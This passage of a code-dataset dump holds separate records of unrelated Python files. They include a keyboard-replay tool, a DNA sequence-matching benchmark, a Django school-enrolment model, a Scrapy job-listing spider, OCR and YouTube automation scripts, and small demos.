key_name, extended = action\n\n # shift ctrl alt\n # if key_code >= 160 and key_code <= 165:\n # key_code = int(key_code/2) - 64\n\n base = 0\n if extended:\n base = win32con.KEYEVENTF_EXTENDEDKEY\n\n if message == 'key down':\n win32api.keybd_event(key_code, 0, base, 0)\n elif message == 'key up':\n win32api.keybd_event(key_code, 0, base | win32con.KEYEVENTF_KEYUP, 0)\n else:\n print('unknow keyboard event:', message)\n\n elif event_type == 'EX':\n\n if message == 'input':\n text = action\n pyperclip.copy(text)\n # Ctrl+V\n win32api.keybd_event(162, 0, 0, 0) # ctrl\n win32api.keybd_event(86, 0, 0, 0) # v\n win32api.keybd_event(86, 0, win32con.KEYEVENTF_KEYUP, 0)\n win32api.keybd_event(162, 0, win32con.KEYEVENTF_KEYUP, 0)\n else:\n print('unknow extra event:', message)\n\n\nclass TaskBarIcon(wxTaskBarIcon):\n ID_About = wx.NewId()\n ID_Closeshow = wx.NewId()\n\n def __init__(self, frame):\n wxTaskBarIcon.__init__(self)\n self.frame = frame\n self.SetIcon(GetMondrianIcon())\n self.Bind(EVT_TASKBAR_LEFT_DCLICK, self.OnTaskBarLeftDClick)\n self.Bind(wx.EVT_MENU, self.OnAbout, id=self.ID_About)\n self.Bind(wx.EVT_MENU, self.OnCloseshow, id=self.ID_Closeshow)\n\n def OnTaskBarLeftDClick(self, event):\n if self.frame.IsIconized():\n self.frame.Iconize(False)\n if not self.frame.IsShown():\n self.frame.Show(True)\n self.frame.Raise()\n\n def OnAbout(self, event):\n wx.MessageBox('https://github.com/taojy123/KeymouseGo', 'KeymouseGo v%s' % VERSION)\n event.Skip()\n\n def OnCloseshow(self, event):\n self.frame.Close(True)\n event.Skip()\n\n def CreatePopupMenu(self):\n menu = wx.Menu()\n menu.Append(self.ID_About, 'About')\n menu.Append(self.ID_Closeshow, 'Exit')\n return menu\n","sub_path":"KeyboardMan/Frame1.py","file_name":"Frame1.py","file_ext":"py","file_size_in_byte":21250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142321369","text":"#! 
/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Time : 2020/8/2 11:49 AM\n# @Author: zhangzhihui.wisdom\n# @File:enumClass.py\n\nfrom enum import Enum\n\n\nif __name__ == '__main__':\n    Month = Enum('Month', ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\n    print(dir(Month))\n    # Enum has no iterms(); iterate the members via __members__.items()\n    for name, member in Month.__members__.items():\n        print(name, '=>', member, ',', member.value)\n    print('''enum class \n    learn\n    ''')\n","sub_path":"enumClass.py","file_name":"enumClass.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"120435310","text":"import json\nimport logging\nfrom os import path\nfrom pathlib import Path\n\nfrom futils import timeit\nfrom tqdm import tqdm\n\nfrom matching import Library, Sequence, match_library\n\n# Logging configuration\ncurrent_file = path.basename(__file__).split(\".\")[0]\n\nlogging.basicConfig(\n    format=\"%(asctime)s:%(levelname)s: %(message)s\",\n    filename=f\"logs/{current_file}.log\",\n    encoding=\"utf-8\",\n    level=logging.DEBUG,\n)\n\n\n# Algorithm Threshold between [0.0, 1.0]\nMATCH_THRESHOLD = 0.99\n\n\n@timeit\ndef match_libs(seq, libs, threshold=0.5):\n    \"\"\"\n    Match libs with the sequence\n    \"\"\"\n    result = []\n    for lib in tqdm(libs):\n        pop = {}\n        pop[\"library\"] = lib[\"name\"]\n        candidates = match_library(seq, Library(lib), threshold)\n        cl = []\n        for candidate in candidates:\n            for c in candidate:\n                cl.append(\n                    {\n                        \"name\": c.name,\n                        \"score\": c.score,\n                        \"start\": c.start,\n                        \"length\": c.length,\n                        \"end\": c.end,\n                    }\n                )\n        pop[\"candidates\"] = cl\n        result.append(pop)\n    return result\n\n\ndef get_sequences(dir_dict):\n    \"\"\"\n    Return list of sequences\n    \"\"\"\n\n    SEQUENCES_EXTENSION = dir_dict[\"extension\"]\n    SEQUENCES_PATH = dir_dict[\"sequences_path\"]\n    seq_dir_names = dir_dict[\"seq_dir_names\"]\n\n    sequences = []\n    for seq_dir in seq_dir_names:\n        seqs = Path(path.join(SEQUENCES_PATH, seq_dir)).rglob(\n            \"*{0}\".format(SEQUENCES_EXTENSION)\n        )\n        sequences.append(seqs)\n    return sequences\n\n\ndef get_slices_libs(template):\n    \"\"\"\n    Get slices libraries\n\n    Args:\n        template (dict): Template JSON data as a dict structure\n    Returns:\n        dict of slices libraries\n    \"\"\"\n\n    slices_libs = {}\n    for sli in template[\"template_slices\"]:\n        libs = []\n        for pos in sli[\"template_slice\"]:\n            lib = template[\"template\"][\"structure\"][pos - 1][\"library_source\"]\n            libs.append(template[\"component_sources\"][lib])\n        slices_libs[sli[\"name\"]] = libs\n    return slices_libs\n\n\n@timeit\ndef iter_all_seq(input_sequences, output_filename, templatef):\n    \"\"\"\n    Iterate over sequences\n\n    Args:\n        input_sequences (dict): Input dictionary with info about the input sequences:\n        output_filename (str): Output filename\n\n    Example:\n\n    input_sequences = {\n        'extension': \".seq\",\n        'sequences_path': \"/data/Imperial/src/lyc-basic-ass-ind/\",\n        'seq_dir_names': [\"output\"]\n    }\n    \"\"\"\n\n    # Get sequences to match\n    sequences = get_sequences(input_sequences)\n\n    # Get the filenames in a list and not this freakin generator\n    seq_filenames = []\n    for seq in sequences:\n        for filename in seq:\n            seq_filenames.append(filename)\n\n    # Loop over the sequences\n    r = []\n    for filename in seq_filenames:\n        sq = Sequence(filename)\n        json_to_output = {}\n        json_to_output[\"target\"] = sq.name\n\n        # Logging\n        logging.info(f\"Target sequence: {sq.name}\")\n\n        with open(templatef) as json_file:\n            template = json.load(json_file)\n\n        # Get libs from template\n        
template[\"template\"]\n libs = get_slices_libs(template)\n\n # Primer\n print(sq.name)\n primer = sq.name.split(\"_\")[2] # \"vio_000_tu5\"\n if primer == \"tu1\":\n libs_to_match = libs['TU-1']\n elif primer == \"tu2\":\n libs_to_match = libs['TU-2']\n elif primer == \"tu3\":\n libs_to_match = libs['TU-3']\n elif primer == \"tu4\":\n libs_to_match = libs['TU-4']\n elif primer == \"tu5\":\n libs_to_match = libs['TU-5']\n else:\n raise OSError(\"Primer not found\",sq.name)\n\n # Match sequence\n matches = match_libs(sq, libs_to_match, threshold=MATCH_THRESHOLD)\n json_to_output[\"matches\"] = matches\n r.append(json_to_output)\n\n # Write output result in JSON file\n with open(output_filename, \"w\") as f:\n json.dump(r, f, indent=2, separators=(\",\", \":\"))\n\n\ndef run_test(targets, candidates, nbloop):\n \"\"\"\n Run tests\n \"\"\"\n\n OUTPUT_DIR = \"output_results/\"\n\n msg = f\"Test Algo1: Target: {targets['seq_dir_names']} - Candidates: {path.basename(candidates)} - Nb runs: {nbloop}\"\n logging.info(msg)\n\n # Iterate and match libs over the input sequences above\n for i in range(nbloop):\n msg = f\"Test run: ({i+1}/{nbloop})\"\n logging.info(msg)\n OUTPUT_FILENAME = f\"matching-results-{current_file}-run-{i}.json\"\n iter_all_seq(targets, path.join(OUTPUT_DIR, OUTPUT_FILENAME), candidates)\n\n\ndef test_algo2_1():\n \"\"\"\n Test Algo2\n 1 Target\n Candidate Template with 5 TUs\n \"\"\"\n\n targets = {\n \"extension\": \".seq\",\n \"sequences_path\": \"/data/Imperial/src/violacein-basic-ass\",\n \"seq_dir_names\": [\"output/tu/\"],\n }\n\n candidates = \"/data/Imperial/src/matching/templates/template_violacein_tu.json\"\n nbloop = 10 \n\n run_test(targets, candidates, nbloop)\n\n\ndef main():\n \"\"\"\n Main\n \"\"\"\n test_algo2_1()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"benchmarks/run_algo2.py","file_name":"run_algo2.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"51469444","text":"import py_avataaars as pa\n\navatar = pa.PyAvataaar(\n style=pa.AvatarStyle.CIRCLE,\n skin_color=pa.SkinColor.LIGHT,\n hair_color=pa.HairColor.BROWN,\n facial_hair_type=pa.FacialHairType.DEFAULT,\n facial_hair_color=pa.FacialHairColor.BLACK,\n top_type=pa.TopType.SHORT_HAIR_SHORT_FLAT,\n hat_color=pa.ClotheColor.BLACK,\n mouth_type=pa.MouthType.SMILE,\n eye_type=pa.EyesType.DEFAULT,\n eyebrow_type=pa.EyebrowType.DEFAULT,\n nose_type=pa.NoseType.DEFAULT,\n accessories_type=pa.AccessoriesType.DEFAULT,\n clothe_type=pa.ClotheType.GRAPHIC_SHIRT,\n clothe_color=pa.ClotheColor.HEATHER,\n clothe_graphic_type=pa.ClotheGraphicType.BAT,\n)\navatar.render_png_file('avatar2.png')\n","sub_path":"Misc/Py_Avatars.py","file_name":"Py_Avatars.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"416714978","text":"#!/usr/bin/env python3\n#Write each line of host.max to host.max.new \n#untill line ## BEGIN DD SECTION\n#Then write contents of sitelist.txt to host.max.new\n\n\nfo_host_og = open('host.max', 'r')\nfo_host_new = open('host.max.new', 'w')\n \nsite_line_fo = open('site_list.txt', 'r')\nsite_line_list = site_line_fo.readlines()\nDEBUG = True\nif DEBUG:\n print('site_line_list: %s' % site_line_list)\n\nfor host_line in fo_host_og.readlines():\n if DEBUG:\n print('\\n\\n--------------------------\\nTop of host_line for loop')\n print('host_line: \"%s\"' % host_line) \n 
fo_host_new.write(host_line)\n    if DEBUG:\n        print('about to do ## BEGIN DD if')\n    if host_line.strip() == '## BEGIN DD SECTION':\n        if DEBUG:\n            print('break works')\n        break\n# readlines() keeps each line's trailing newline, so join with an empty string\nsite_line_string = \"\".join(site_line_list)\nfo_host_new.write(site_line_string)\nif DEBUG: \n    print('about to write site_list.txt contents')\nprint('this is after the for loop') ","sub_path":"D_D.py","file_name":"D_D.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"145690979","text":"from PIL import ImageGrab,Image\r\nimport keyboard  # keyboard hook for hotkey monitoring\r\nfrom time import sleep\r\nimport sys\r\nfrom BaiDu import BaiDuAPI\r\nfrom getText import GetText\r\nimport os\r\n\r\nDIR_PATH = os.getcwd()\r\n\r\n# Grab the screenshot image from the clipboard and save it locally\r\ndef screenShot():\r\n    # QQ screenshot: press Ctrl+Alt+A to capture, then Enter to confirm\r\n    if keyboard.wait(hotkey='f1') is None:\r\n        if keyboard.wait(hotkey='enter') is None:\r\n            sleep(0.01)\r\n            # Read the image content from the clipboard\r\n            im=ImageGrab.grabclipboard()\r\n            # Check whether im is actually an image\r\n            if isinstance(im,Image.Image):\r\n                im.save('imageGrab.png')\r\n            else:\r\n                print('Please take the screenshot again')\r\n    else:\r\n        print('Press F1 to take a screenshot for text recognition')\r\n\r\nif __name__=='__main__':\r\n    baiduapi=BaiDuAPI(DIR_PATH + r'\\password.ini')\r\n    #baiduapi=BaiDuAPI\r\n    \r\n    # Looping up to sys.maxsize keeps taking screenshots without ever exiting\r\n    for _ in range(sys.maxsize):\r\n        \r\n        screenShot()\r\n        \r\n        text=baiduapi.picture2Text(DIR_PATH + r'\\imageGrab.png')\r\n        \r\n        print(text)\r\n        GetText.setText(text)\r\n        GetText.getText()","sub_path":"screenShot.py","file_name":"screenShot.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"95758826","text":"import csv, sys\n\npodcast_csv = open('podcastInfo.csv')\nrss_file = open('rssFeed.txt', 'w')\n\npodreader = csv.reader(podcast_csv, delimiter=',')\n\nrss_links = [line[6] for line in podreader if len(line) >= 7]\n\nfor rss in rss_links:\n\trss_file.write(f'{rss}\\n')","sub_path":"_site/convertCsv.py","file_name":"convertCsv.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"302899854","text":"# coding: utf-8\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup\nimport requests\ndriver = webdriver.Chrome(\"D:/Programming/chromedriver.exe\") # Opening Chrome browser.\ndriver.get(\"https://youtube.com\")\nelem = driver.find_element_by_name(\"search_query\")\nelem.clear()\nsong = input(\"Enter the name of the song : \")\nelem.send_keys(song)\nelem.send_keys(Keys.RETURN)\nurl = driver.current_url\npage = requests.get(url)\nsoup = BeautifulSoup(page.text, 'html.parser')\nlinks = soup.find_all(\"h3\")\nlnk = links[3].find_all(\"a\")\nlink = lnk[0][\"href\"]\ndriver.get(\"https://youtube.com\" + link)","sub_path":"YouTube_Songs.py","file_name":"YouTube_Songs.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"477456876","text":"import scipy.io\nfrom sklearn.model_selection import StratifiedShuffleSplit\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom dataset import get_transforms, DigitsDataset\nfrom utils import seed_fn\n\n\ndef get_loader(X, y, stage='TRAIN', shuffle=True, bs=32, num_workers=0):\n    transforms = get_transforms(stage)\n    dataset = DigitsDataset(\n        data=X, labels=y,\n        transforms=transforms,\n    )\n    loader = DataLoader(\n        dataset, batch_size=bs, 
shuffle=shuffle,\n        num_workers=num_workers, worker_init_fn=seed_fn,\n    )\n\n    return loader\n\n\ndef load_svhn(path):\n    data = scipy.io.loadmat(path)\n    imgs, labels = data['X'], data['y']\n    imgs = imgs.transpose(3, 0, 1, 2)\n    labels = labels.reshape(-1)\n    labels[labels==10] = 0\n\n    return imgs, labels\n\n\ndef load_mnist(path):\n    imgs, labels = torch.load(path)\n    imgs = torch.stack([imgs]*3, dim=-1).numpy()\n\n    return imgs, labels\n\n\ndef get_data(data_path, svhn_path, mnist_path):\n    X, y = load_svhn(data_path / svhn_path)\n    test_X, test_y = load_mnist(data_path / mnist_path)\n\n    sss = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=0)\n    for train_index, valid_index in sss.split(X, y):\n        break\n    train_X, train_y = X[train_index], y[train_index]\n    valid_X, valid_y = X[valid_index], y[valid_index]\n\n    return train_X, train_y, valid_X, valid_y, test_X, test_y","sub_path":"dataset/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"60274886","text":"from django.db import models\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\nclass Pessoa(models.Model):\n\tnome = models.CharField(max_length=200, null=True, blank=True)\n\temail = models.EmailField(max_length=100, null=True, blank=True, unique=True)\n\tcpf = models.CharField(max_length=20, null=True, blank=True, unique=True)\n\tcontato = models.CharField(max_length=100, null=True, blank=True)\n\tusuario = models.OneToOneField(User, on_delete=models.CASCADE, null=True, blank=True)\n\n\tdef __str__(self):\n\t\treturn self.nome\n\nclass Aluno(Pessoa):\n\tnascimento = models.DateField(null=True, blank=True)\n\nclass Funcionario(Pessoa):\n\n\tsalario = models.FloatField(max_length=20, null=True, blank=True)\n\tdata_contratacao = models.DateField(null=True, blank=True)\n\n\nclass Endereco(models.Model):\n\tuf_choices = [\n\t\t\t('AC', 'Acre'),\n\t\t\t('AL', 'Alagoas'),\n\t\t\t('AM', 'Amazonas'),\n\t\t\t('AP', 'Amapá'),\n\t\t\t('BA', 'Bahia'),\n\t\t\t('CE', 'Ceará'),\n\t\t\t('DF', 'Distrito Federal'),\n\t\t\t('ES', 'Espírito Santo'),\n\t\t\t('GO', 'Goiás'),\n\t\t\t('MA', 'Maranhão'),\n\t\t\t('MG', 'Minas Gerais'),\n\t\t\t('MS', 'Mato Grosso do Sul'),\n\t\t\t('MT', 'Mato Grosso'),\n\t\t\t('PA', 'Pará'),\n\t\t\t('PB', 'Paraíba'),\n\t\t\t('PE', 'Pernambuco'),\n\t\t\t('PI', 'Piauí'),\n\t\t\t('PR', 'Paraná'),\n\t\t\t('RJ', 'Rio de Janeiro'),\n\t\t\t('RN', 'Rio Grande do Norte'),\n\t\t\t('RO', 'Rondônia'),\n\t\t\t('RR', 'Roraima'),\n\t\t\t('RS', 'Rio Grande do Sul'),\n\t\t\t('SC', 'Santa Catarina'),\n\t\t\t('SE', 'Sergipe'),\n\t\t\t('SP', 'São Paulo'),\n\t\t\t('TO', 'Tocantins')\n\t\t\t]\n\tcep = models.CharField(max_length=10)\n\tuf = models.CharField(max_length=2, choices=uf_choices)\n\tcidade = models.CharField(max_length=100)\n\tbairro = models.CharField(max_length=20)\n\tnumero = models.CharField(max_length=10)\n\trua = models.CharField(max_length=20)\n\tpessoa = models.OneToOneField(Pessoa, blank=True, null=True, on_delete=models.CASCADE)\n\n\tdef __str__(self):\n\t\treturn self.rua\n\n\n\nclass Turma(models.Model):\n\tturma = models.CharField(max_length=20)\n\tcodigo = models.CharField(max_length=20)\n\n\tdef __str__(self):\n\t\treturn self.turma\n\n\n\nclass Turno(models.Model):\n\tturno = models.CharField(max_length=10)\n\n\tdef __str__(self):\n\t\treturn self.turno\n\n\n\nclass Matricula(models.Model):\n\tstatus_choices=[\n\t\t\t('PENDENTE', 'PENDENTE'),\n\t\t\t('CONCLUÍDA', 
'CONCLUÍDA'),\n\t\t\t('CANCELADA', 'CANCELADA'),\n\t\t\t('RECUSADA', 'RECUSADA')\n\n\t\t\t]\n\tdata = models.DateTimeField(auto_now_add=False, blank=True, null=True)\n\tmatricula= models.CharField(max_length=20, null=True, blank=True, unique=True)\n\t\n\taluno = models.ForeignKey(Aluno, blank=True, null=True, on_delete=models.CASCADE)\n\tturma= models.ForeignKey(Turma, blank=True, null=True, on_delete=models.CASCADE)\n\tturno = models.ForeignKey(Turno, blank=True, null=True, on_delete=models.CASCADE)\n\tanexos = models.FileField(upload_to = \"SistemaEscolar/doc\", blank = True, null= True)\n\tobservacao = models.TextField(blank=True, null=True)\n\tstatus = models.CharField(max_length=20, null=True, choices=status_choices, default='PENDENTE')\n\n\tdef __str__(self):\n\t\treturn self.matricula\n\nclass Observacao(models.Model):\n\tstatus_choices=[\n\t\t\t('PENDENTE', 'PENDENTE'),\n\t\t\t('CONCLUÍDA', 'CONCLUÍDA'),\n\t\t\t\n\t\t\t]\n\taluno = models.ForeignKey(Aluno, blank=True, null=True, on_delete=models.CASCADE)\n\tobservacao = models.TextField(blank=True, null=True)\n\tdata = models.DateTimeField(auto_now_add=True, blank=True, null=True)\n\tstatus = models.CharField(max_length=20, null=True, choices=status_choices, default='PENDENTE')\n\n\n\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t","sub_path":"SistemaEscolar/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"155426275","text":"# Charged particle trajectory under electric and magnetic fields\nfrom pylab import *\nfrom scipy import integrate\n\nm = 25.0\t# Mass and \nq = 5.0\t\t# Charge of the particle\nEx = 0.0\t# Electric Field vector\nEy = 0.0\nEz = 0.0\nBx = 0.0\t# Magnetic field vector\nBy = 0.0\nBz = 5.0\n\ndef solver(X, t0): # X contains x,y,z and dx,dy,dz , 6 elements\n\tvx = X[3]\n\tvy = X[4]\n\tvz = X[5]\n\tax = q * (Ex + (vy * Bz) - (vz * By) ) /m\t# Lorentz force / mass\n\tay = q * (Ey - (vx * Bz) + (vz * Bx) ) /m\n\taz = q * (Ez + (vx * By) - (vy * Bx) ) /m\n\treturn [vx, vy, vz, ax, ay, az ]\n\t\npv0 = [0,0,0, 0,1,0]\t\t# position & velocity at t = 0\nt = arange(0, 50, 0.01)\t\t# duration and steps\npv = integrate.odeint(solver, pv0, t)\t\t# integrate\n\nfrom mpl_toolkits.mplot3d import Axes3D\nax = Axes3D(figure())\nax.plot(pv[:,0], pv[:,1], pv[:,2])\t\t\t# 3d plot of x, y and z\nax.set_zlabel('Z axis')\nshow()\n\n\n","sub_path":"Documents/Examples/Lorentz-force-scipy.py","file_name":"Lorentz-force-scipy.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"322748321","text":"def my_abs(x):\n\tif not isinstance(x,(int,float)):\n\t\traise TypeError('bad operand type');\n\tif x >=0 :\n\t\treturn x\n\telse:\n\t\treturn -x\n\nprint(my_abs(-99))\n\ndef nop():\n\tpass\n\"\"\"\npass语句什么都不做,那有什么用?\n实际上pass可以用来作为占位符,\n比如现在还没想好怎么写函数的代码,就可以先放一个pass,让代码能运行起来。\n\"\"\"\n\n#返回多个值\nimport math\n\ndef move(x, y, step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\nx, y = move(100, 100, 60, math.pi / 6)\nprint(x, y)\n\nr = move(100, 100, 60, math.pi / 6)\nprint(r)\n\ndef square(x):\n\t'Calculates the square of the number x.'\n\treturn x * x\n\nprint(square.__doc__)\n\nhelp(square)","sub_path":"python/python_base/函数/定义函数.py","file_name":"定义函数.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} 
+{"seq_id":"136840129","text":"import yaml\nimport boids\nfrom copy import deepcopy\nbefore=deepcopy(boids.boid_data)\nboids.update_boids(boids.boid_data)\nafter=boids.boid_data\nfixture={\"before\":before,\"after\":after}\nfixture_file=open(\"fixture.yml\",'w')\nfixture_file.write(yaml.dump(fixture))\nfixture_file.close()\n","sub_path":"record_fixture.py","file_name":"record_fixture.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"353362374","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTMP_Jobs spider created on the top of ATSSpider\n\nscrapy crawl tmp_jobs -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"https://www.jobs-ups.com/search-jobs\"\n\nSeed URL:\n https://www.jobs-ups.com/search-jobs\n https://jobs.aarons.com/search-jobs\n https://jobs.bd.com/search-jobs\n https://jobs.capitalone.com/search-jobs\n https://jobs.tenethealth.com/search-jobs\n https://jobs.chipotle.com/search-jobs\n\"\"\"\n\nfrom json import loads\nfrom re import compile\nfrom scrapy.http import Request, FormRequest\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin, urlparse\nfrom urllib import urlencode\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import ConvertDateString, HtmlFormatter, Prefix, Replace\n\n\nclass TMP_Jobs(ATSSpider):\n\n name = 'tmp_jobs'\n ref_id = compile(r'\\/?-?(\\d+)$')\n rec_per_page = 15\n company_xpath = []\n company = ''\n logo_url = ''\n page = 1\n max_page = 0\n\n def __init__(self, *args, **kwargs):\n super(TMP_Jobs, self).__init__(*args, **kwargs)\n if 'url' in kwargs:\n url_parsed = urlparse(kwargs['url']).netloc.split('.')\n if url_parsed:\n self.company = url_parsed[1]\n\n def parse(self, response):\n try:\n jsonResponse = loads(response.body.decode('utf-8'))\n sel = Selector(text=jsonResponse.get('results'), type='html')\n except:\n sel = Selector(response)\n\n if not self.expected_job_count_set:\n expected_count = sel.xpath(\n '//section/h1[@role=\"status\"]/text()'\n ).extract()\n if expected_count:\n self.expected_job_count = expected_count\n\n max_page = sel.xpath(\n '//div[@class=\"pagination-page-count\"]/input[@id=\"pagination-current-bottom\"]/@max'\n ).extract()\n if max_page:\n self.max_page = int(max_page[0])\n\n if not self.logo_url:\n self.logo_url = sel.xpath(\n '//a[@class=\"logo\"]/img/@src |'\n '//h1/a/img[contains(@src, \"logo\")]/@src'\n ).extract()\n if self.logo_url:\n if not urlparse(self.logo_url[0]).scheme:\n self.logo_url = 'http:%s' % self.logo_url[0]\n\n for li in sel.xpath(\n '//section[@id=\"search-results-list\"]//ul/li |'\n '//section[@id=\"search-results\"]//ul/li'\n ):\n href = li.xpath('./a/@href').extract()\n if href:\n yield Request(\n callback=self.parse_job_callback(),\n meta={\n 'location': li.xpath(\n './a/*[@class=\"job-location\"]/text() |'\n './span[@class=\"job-location\"]/text()'\n ).extract(),\n },\n url=urljoin(response.url, href[0]),\n )\n\n # pagination\n if self.page < self.max_page:\n self.page += 1\n params = {\n \"ActiveFacetID\": \"0\",\n \"CurrentPage\": str(self.page),\n \"RecordsPerPage\": \"%s\" % self.rec_per_page,\n \"Distance\": \"\",\n \"Keywords\": \"\",\n \"Location\": \"\",\n \"Latitude\": \"null\",\n \"Longitude\": \"null\",\n \"ShowRadius\": \"False\",\n \"FacetTerm\": \"\",\n \"FacetType\": \"0\",\n \"FacetFilters\": \"[]\",\n \"SearchResultsModuleName\": \"Search Results\",\n \"SearchFiltersModuleName\": 
\"Search Filters\",\n \"SortCriteria\": \"0\",\n \"SortDirection\": \"0\",\n \"SearchType\": \"5\",\n \"CategoryFacetTerm\": \"null\",\n \"CategoryFacetType\": \"null\",\n \"LocationFacetTerm\": \"null\",\n \"LocationFacetType\": \"null\",\n \"KeywordType\": \"null\",\n \"LocationType\": \"null\",\n \"LocationPath\": \"null\",\n \"OrganizationIds\": \"null\",\n }\n yield Request(\n callback=self.parse,\n headers={'X-Requested-With': 'XMLHttpRequest'},\n url=urljoin(response.url, '/search-jobs/results?%s' % urlencode(params))\n )\n\n def parse_job(self, response):\n sel = Selector(response)\n\n description_xpaths = [\n [\n '//tr/td[text()=\"Job Description\"]',\n '//tr[td[text()=\"Job Description\"]]/following-sibling::tr[1]'\n ],\n '//section/div[@itemprop=\"description\"]',\n '//div/div[@itemprop=\"description\"]',\n '//div[@class=\"job\"]',\n ]\n loader = BrightcorpItemLoader(selector=sel)\n loader.add_xpath(\n 'title',\n '//section[@class=\"job-description\"]/h1[@itemprop=\"title\"]/text() |'\n '//*[@itemprop=\"title\"]/text()'\n )\n loader.add_xpath(\n 'jobcategory',\n '//div/b[contains(text(), \"job\")]/../text() |'\n '//div/h2/span[contains(text(), \"Job\")]/../following-sibling::span/text() |'\n '//div/strong/span[contains(text(), \"Job\")]/../following-sibling::span/text()'\n )\n if not loader.get_output_value('jobcategory'):\n loader.add_xpath(\n 'jobcategory',\n '//tr/td[contains(text(), \"Job Category\")]/../following-sibling::tr[1]/td/text() |'\n '//*/text()[contains(., \"Area of Expertise:\")]',\n Replace('Area of Expertise:')\n )\n loader.add_xpath(\n 'jobtype',\n '//div/b[contains(text(), \"Schedule\")]/../text() |'\n '//div/strong/span[contains(text(), \"Schedule\")]/../following-sibling::span/text()'\n )\n if not loader.get_output_value('jobtype'):\n loader.add_xpath(\n 'jobtype',\n '//tr/td[contains(text(), \"Employment Status\")]/../following-sibling::tr[1]/td/text() |'\n '//*/text()[contains(., \"Contract:\")]',\n Replace('Contract:')\n )\n loader.add_value(\n 'location', response.meta.get('location')\n )\n loader.add_xpath(\n 'expiration_date',\n '//*/text()[contains(., \"Vacancy Closing:\")]',\n Replace('Vacancy Closing:'), ConvertDateString('%d/%m/%Y')\n )\n loader.add_xpath(\n 'date',\n '//section//span[@itemprop=\"datePosted\"]/text() |'\n '//ul/li[@itemprop=\"datePosted\"]/text()',\n ConvertDateString('%m/%d/%Y')\n )\n if not loader.get_output_value('date'):\n loader.add_xpath(\n 'date', '//*/text()[contains(., \"Date Live:\")]',\n Replace('Date Live:'), ConvertDateString('%d/%m/%Y')\n )\n loader.add_xpath('company', self.company_xpath)\n for description_xpath in description_xpaths:\n loader.add_xpath(\n 'description',\n description_xpath,\n HtmlFormatter()\n )\n if loader.get_output_value('description'):\n break\n loader.add_value(\n 'referencenumber',\n response.url,\n Prefix('%s-%s-' % (self.name, self.company)),\n re=self.ref_id\n )\n loader.add_value('url', response.url)\n loader.add_value('apply_url', response.url)\n loader.add_value(\n 'logo_url',\n self.logo_url\n )\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/tmp_jobs.py","file_name":"tmp_jobs.py","file_ext":"py","file_size_in_byte":7700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"29045116","text":"import wx\nfrom pprint import pprint as pp\nclass DataControl(object):\n\tct = {}\n\tdef __init__(self):\n\t\tself.ct[self.__class__.__name__]=[]\n\tdef getc(self, 
ctrl):\n\t\tself.ct[self.__class__.__name__].append(ctrl)\n\t\treturn ctrl\nclass DataPanel(wx.Panel, DataControl):\n\t\"\"\" \"\"\"\n\tsize=(400,400)\n\n\tdef __init__(self, *args, **kwargs):\n\t\tDataControl.__init__(self)\n\t\tif 'size' not in kwargs: kwargs['size'] = self.size\n\t\tvalue = kwargs.pop('value', 'N/A')  # pop() tolerates a missing 'value' key\n\t\twx.Panel.__init__(self, *args, **kwargs)\n\t\tcontrol = self.getc(wx.TextCtrl(self, style=wx.TE_MULTILINE, value=value))\n\t\ttry:\n\t\t\ta = 1 / 0  # deliberate error: exercises the control-cleanup path below\n\t\texcept Exception as ex:\n\t\t\twx.MessageBox(str(ex))\n\t\t\tfor obj in self.ct[self.__class__.__name__]:\n\t\t\t\tobj.Destroy()\n\t\t\traise\n\n\t\tif 1:\n\t\t\tsizer = wx.BoxSizer(wx.VERTICAL)\n\t\t\tsizer.Add(control, 1, wx.EXPAND|wx.ALL, 40) \n\n\t\t\tself.SetSizer(sizer)\n\t\t\tself.SetAutoLayout(True)\n\t\t\tsizer.Fit(self)\n\n\t\t#self.Show(True)\n\ndef 